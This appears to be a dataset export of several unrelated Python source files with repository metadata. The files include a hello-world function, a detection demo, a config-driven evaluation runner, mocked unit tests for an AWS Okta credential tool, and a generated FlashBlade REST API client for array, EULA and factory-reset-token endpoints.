bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 40
|
2020-05-05T09:26:03.000Z
|
2022-03-13T16:14:41.000Z
|
def get_hello_world() -> str:
return "Hello World"
| 18.333333
| 29
| 0.672727
| 8
| 55
| 4.375
| 0.75
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 55
| 2
| 30
| 27.5
| 0.795455
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
85163ecbf36a453edd7f30109e9926d0ea8877f2
| 169
|
py
|
Python
|
demo.py
|
chuzcjoe/dms_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | 4
|
2019-07-26T07:41:34.000Z
|
2019-11-03T18:44:27.000Z
|
demo.py
|
chuzcjoe/distracted_driver_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | 1
|
2020-01-21T20:12:23.000Z
|
2020-01-21T20:12:35.000Z
|
release/demo.py
|
chuzcjoe/distracted_driver_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | null | null | null |
from detect import Detection
#from Detection import detect
print(Detection().detect('test.jpg'))
print(Detection().detect('test2.jpg'))
#Detection().detect('test.jpg')
| 24.142857
| 38
| 0.751479
| 22
| 169
| 5.772727
| 0.363636
| 0.354331
| 0.314961
| 0.346457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006369
| 0.071006
| 169
| 6
| 39
| 28.166667
| 0.802548
| 0.343195
| 0
| 0
| 0
| 0
| 0.155963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
517e6846831c47ae5af9e391348dfdd3a4ee0cf6
| 570
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_0_GridDistortion.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_1_GridDistortion.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_2_GridDistortion.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_3_GridDistortion.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_4_GridDistortion.yml",
]
for l in ls:
os.system(l)
| 51.818182
| 108
| 0.854386
| 80
| 570
| 5.7125
| 0.3
| 0.109409
| 0.131291
| 0.207877
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0
| 0.055659
| 0.054386
| 570
| 11
| 109
| 51.818182
| 0.792208
| 0
| 0
| 0
| 0
| 0
| 0.884413
| 0.665499
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
517f6e00126117133317e35a15c52cac286da631
| 5,061
|
py
|
Python
|
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from unittest import mock
from tests.test_base import TestBase
from tests.test_base import SAML_RESPONSE
from mock import patch, call
from mock import MagicMock
from aws_okta_processor.commands.authenticate import Authenticate
from aws_okta_processor.core.fetcher import SAMLFetcher
# Need to add actual tests
class TestFetcher(TestBase):
@patch("botocore.client")
@patch('aws_okta_processor.core.fetcher.print_tty')
@patch('aws_okta_processor.core.fetcher.Okta')
def test_fetcher(
self,
mock_okta,
mock_print_tty,
mock_client
):
self.OPTIONS["--role"] = "arn:aws:iam::2:role/Role-One"
mock_okta().get_saml_response.return_value = SAML_RESPONSE
mock_cache = MagicMock()
authenticate = Authenticate(self.OPTIONS)
fetcher = SAMLFetcher(authenticate, cache=mock_cache)
fetcher.fetch_credentials()
@patch("boto3.client")
@patch('aws_okta_processor.core.fetcher.print_tty')
@patch('aws_okta_processor.core.fetcher.prompt.print_tty')
@patch('aws_okta_processor.core.fetcher.prompt.input', return_value='1')
@patch('aws_okta_processor.core.fetcher.Okta')
def test_fetcher_should_filter_accounts(
self,
mock_okta,
mock_prompt,
mock_prompt_print_tty,
mock_print_tty,
mock_client
):
def assume_role_side_effect(*args, **kwargs):
if kwargs['RoleArn'] == 'arn:aws:iam::1:role/Role-One':
return {
'Credentials': {
'AccessKeyId': 'test-key1',
'SecretAccessKey': 'test-secret1',
'SessionToken': 'test-token1',
'Expiration': datetime(2020, 4, 17, 12, 0, 0, 0)
}
}
raise RuntimeError('invalid RoleArn')
self.OPTIONS["--account-alias"] = '1*'
self.OPTIONS["--pass"] = 'testpass'
mock_c = mock.Mock()
mock_c.assume_role_with_saml.side_effect = assume_role_side_effect
mock_okta().get_saml_response.return_value = SAML_RESPONSE
mock_client.return_value = mock_c
authenticate = Authenticate(self.OPTIONS)
fetcher = SAMLFetcher(authenticate, cache={})
creds = fetcher.fetch_credentials()
self.assertDictEqual({
'AccessKeyId': 'test-key1',
'Expiration': '2020-04-17T12:00:00',
'SecretAccessKey': 'test-secret1',
'SessionToken': 'test-token1'
}, creds)
self.assertEqual(5, mock_prompt_print_tty.call_count)
MagicMock.assert_has_calls(mock_prompt_print_tty, [
call('Select AWS Role:'),
call('Account: 1', indents=0),
call('[ 1 ] Role-One', indents=1),
call('[ 2 ] Role-Two', indents=1),
call('Selection: ', newline=False)
])
@patch("boto3.client")
@patch('aws_okta_processor.core.fetcher.print_tty')
@patch('aws_okta_processor.core.fetcher.prompt.print_tty')
@patch('aws_okta_processor.core.fetcher.prompt.input', return_value='1')
@patch('aws_okta_processor.core.fetcher.Okta')
def test_fetcher_should_prompt_all_accounts(
self,
mock_okta,
mock_prompt,
mock_prompt_print_tty,
mock_print_tty,
mock_client
):
def assume_role_side_effect(*args, **kwargs):
if kwargs['RoleArn'] == 'arn:aws:iam::1:role/Role-One':
return {
'Credentials': {
'AccessKeyId': 'test-key1',
'SecretAccessKey': 'test-secret1',
'SessionToken': 'test-token1',
'Expiration': datetime(2020, 4, 17, 12, 0, 0, 0)
}
}
raise RuntimeError('invalid RoleArn')
self.OPTIONS["--pass"] = 'testpass'
mock_c = mock.Mock()
mock_c.assume_role_with_saml.side_effect = assume_role_side_effect
mock_okta().get_saml_response.return_value = SAML_RESPONSE
mock_client.return_value = mock_c
authenticate = Authenticate(self.OPTIONS)
fetcher = SAMLFetcher(authenticate, cache={})
creds = fetcher.fetch_credentials()
self.assertDictEqual({
'AccessKeyId': 'test-key1',
'Expiration': '2020-04-17T12:00:00',
'SecretAccessKey': 'test-secret1',
'SessionToken': 'test-token1'
}, creds)
self.assertEqual(7, mock_prompt_print_tty.call_count)
MagicMock.assert_has_calls(mock_prompt_print_tty, [
call('Select AWS Role:'),
call('Account: 1', indents=0),
call('[ 1 ] Role-One', indents=1),
call('[ 2 ] Role-Two', indents=1),
call('Account: 2', indents=0),
call('[ 3 ] Role-One', indents=1),
call('Selection: ', newline=False)
])
| 35.391608
| 76
| 0.589212
| 547
| 5,061
| 5.210238
| 0.184644
| 0.039298
| 0.067368
| 0.077193
| 0.861404
| 0.825614
| 0.806667
| 0.806667
| 0.782105
| 0.782105
| 0
| 0.025154
| 0.293025
| 5,061
| 143
| 77
| 35.391608
| 0.771381
| 0.004742
| 0
| 0.781513
| 0
| 0
| 0.232129
| 0.099087
| 0
| 0
| 0
| 0
| 0.05042
| 1
| 0.042017
| false
| 0.016807
| 0.067227
| 0
| 0.134454
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ace97bf7b8e6b0445efe966ab2ed31dd65af4f
| 83
|
py
|
Python
|
regulus/models/__init__.py
|
yarden-livnat/regulus
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-16T20:47:48.000Z
|
2020-01-07T15:58:18.000Z
|
regulus/models/__init__.py
|
yarden-livnat/regulus.py
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-25T07:18:39.000Z
|
2020-05-06T19:41:38.000Z
|
regulus/models/__init__.py
|
yarden-livnat/regulus.py
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-16T20:48:05.000Z
|
2018-08-30T20:38:00.000Z
|
from .linear_model import *
from .quadratic_model import *
from .inv_reg import *
| 16.6
| 30
| 0.771084
| 12
| 83
| 5.083333
| 0.583333
| 0.360656
| 0.491803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 83
| 4
| 31
| 20.75
| 0.871429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
51e66c72f1854aa2c99c7c11621d792b4bacc228
| 59,774
|
py
|
Python
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.1, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re
# python 2 and python 3 compatibility library
import six
from typing import List, Optional
from .. import models
class ArraysApi(object):
def __init__(self, api_client):
self.api_client = api_client
def api21_arrays_eula_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.EulaGetResponse
"""GET arrays/eula
List the End User Agreement and signature.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_eula_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: EulaGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_eula_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_eula_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/eula', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EulaGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_eula_patch_with_http_info(
self,
eula=None, # type: models.Eula
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.EulaResponse
"""PATCH arrays/eula
Modifies the signature on the End User Agreement.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_eula_patch_with_http_info(eula, async_req=True)
>>> result = thread.get()
:param Eula eula: (required)
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: EulaResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'eula' is set
if eula is None:
raise TypeError("Missing the required parameter `eula` when calling `api21_arrays_eula_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'eula' in params:
body_params = params['eula']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/eula', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EulaResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_delete_with_http_info(
self,
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""Delete a factory reset token
Deletes any existing token that could be used to perform a factory reset on the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_delete_with_http_info(async_req=True)
>>> result = thread.get()
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayFactoryResetTokenGetResponse
"""List factory reset tokens
Displays a list of tokens used to perform a factory reset on the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayFactoryResetTokenGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_factory_reset_token_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_factory_reset_token_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayFactoryResetTokenGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_post_with_http_info(
self,
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayFactoryResetTokenResponse
"""Create a factory reset token
Creates a token that can be used to perform a factory reset on the array. Factory reset tokens can only be created after the array has been prepared for reset (e.g., all file systems, buckets, and snapshots must first be eradicated). After a token has been created, operations that would take the array out of the prepared state (e.g., creating file systems) are disabled until all tokens have been deleted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_post_with_http_info(async_req=True)
>>> result = thread.get()
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayFactoryResetTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayFactoryResetTokenResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayGetResponse
"""GET arrays
List array attributes such as the array name, ID, version, and NTP servers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_http_specific_performance_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayHttpSpecificPerformanceGet
"""GET arrays/http-specific-performance
List the HTTP performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_http_specific_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayHttpSpecificPerformanceGet
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/http-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayHttpSpecificPerformanceGet',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
